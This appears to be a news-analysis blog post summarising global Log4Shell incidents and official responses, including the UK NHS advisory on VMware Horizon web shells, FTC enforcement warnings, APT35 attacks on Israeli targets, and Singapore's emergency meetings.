For coverage of the recent press conference by CISA Director Jen Easterly and a general summary of U.S.-based Apache Log4j alerts and mitigation efforts (including the recent US-CERT and Carnegie Mellon Software Institute update of VU#930724 – Apache Log4j allows insecure JNDI lookups) see our previous post: Log4Shell Update from CISA Director Easterly and DHS CISA JCDC Company Updates.

Note: as we authored this post today, Check Point Research released the following: APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit.

It is the most up-to-the-minute item included in the global Log4Shell incidents and mitigation activities summarized below.

OODA Loop Sponsor

Log4Shell Incidents and Mitigation Activities: Governmental Agencies (Global)

Source: UK NHS

United Kingdom (UK) National Health Service VMware Horizon Server Advisory

On January 5th, the UK’s National Health Service (NHS) released an advisory: Log4Shell Vulnerabilities in VMware Horizon Targeted to Install Web Shells. According to the UK NHS alert:

“An unknown threat group has been observed targeting VMware Horizon servers running versions affected by Log4Shell vulnerabilities in order to establish persistence within affected networks. The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface(JNDI) via Log4Shell payloads to call back to malicious infrastructure. Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service. The web shell can then be used by an attacker to carry out a number of malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware.”

Federal Trade Commission (FTC) Threatens Legal Action

In a press release on January 4th, Federal Trade Commission announced that it “intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.” This move by the FTC is consistent with the new types of corporate and governmental legal actions directed at cyber threats.

This would not be the first time that the FTC has used such legal activities to provide an incentive for companies to patch security vulnerabilities, as the Federal Trade Commission Act and the Gramm Leach Bliley Act allowed for the 2017 lawsuit against Equifax, “the US credit monitoring service that leaked the data of more than 147 million Americans after failing to patch an Apache Struts server…[in 2019], Equifax settled the FTC lawsuit and agreed to pay $700 million to affected consumers.” (1)

The Belgian Defense Ministry Attack

In a press conference yesterday, CISA Director Jen Easterly confirmed that CISA is aware of attacks impacting foreign government agencies, including the Belgian Defense Ministry This Defense Ministry attack should not be confused with our recent coverage of the UK’s Defence Academy, which was hit by cyberattack last year which caused significant damage, prompting the Academy to rebuild its network. This UK Defence Academy attack has not been attributed to the Apache Log4j vulnerability.

The Belgian Defense Ministry was attacked early in December when the discovery of the Log4j vulnerability was in its infancy. The Defense Ministry confirmed the attack on December 16th.

Israeli Government Sites Targeted by Iranian APT Phosphorus

In the same time frame as the Belgian Defense Ministry attack, Check Point Software Technologies provided to the Israeli government evidence that Phosphorus (aka Charming Kitten or APT 35) a group of Iranian hackers linked Iranian regime “exploited the flaw in Log4j to carry out attacks against seven targets in Israel, including government sites.” We recently reported on the resurgence of Iranian hacking activity with the Log4Shell exploit used in a Cox Media Group (CMG) ransomware attack, which was attributed to Iranian APT Phosphorus as well.

Checkpoint Research just posted this breakdown of Phosporus’ efforts to exploit Log4j vulnerability to distribute new modular PowerShell toolkit.

Source: CheckPoint Research

Also of interest from a recent Check Point report: “[As early as Friday, December 10th], Check Point has tracked down and stopped more than 1.8 million attempts to exploit the Log4j vulnerability around the world. The company has identified the attacks in close to half, 46 percent, of the corporate networks in the world – and in more than half, 54 percent, of the corporate networks in Israel – although the number of actual attacks is probably higher.”

Singapore’s Cyber Security Agency (CSA) held Emergency Meetings with Critical Information Infrastructure (CII) sectors

Singapore has progressively bolstered its cybersecurity efforts in the last few years, through the creation of the Defence Cyber Organisation (DCO) in 2017 and, in 2015, standing up the Singapore’s Cyber Security Agency (CSA), a new government agency to oversee Singapore’s cybersecurity operations.

During the early onset of the Log4j threat, at the same time in mid-December that CISA ordered federal civilian agencies to patch Log4j vulnerability and 12 others by December 24, 2021, according to ZDNet the Singapore CSA held “emergency meetings with critical information infrastructure (CII) sectors to prepare them for potential threats stemming from the Log4j vulnerability. The CSA also sent out an alert warning that the critical vulnerability, when exploited successfully, could allow attackers to gain full control of affected servers. It noted that there was only a short window to deploy mitigation measures and organizations should do so quickly.”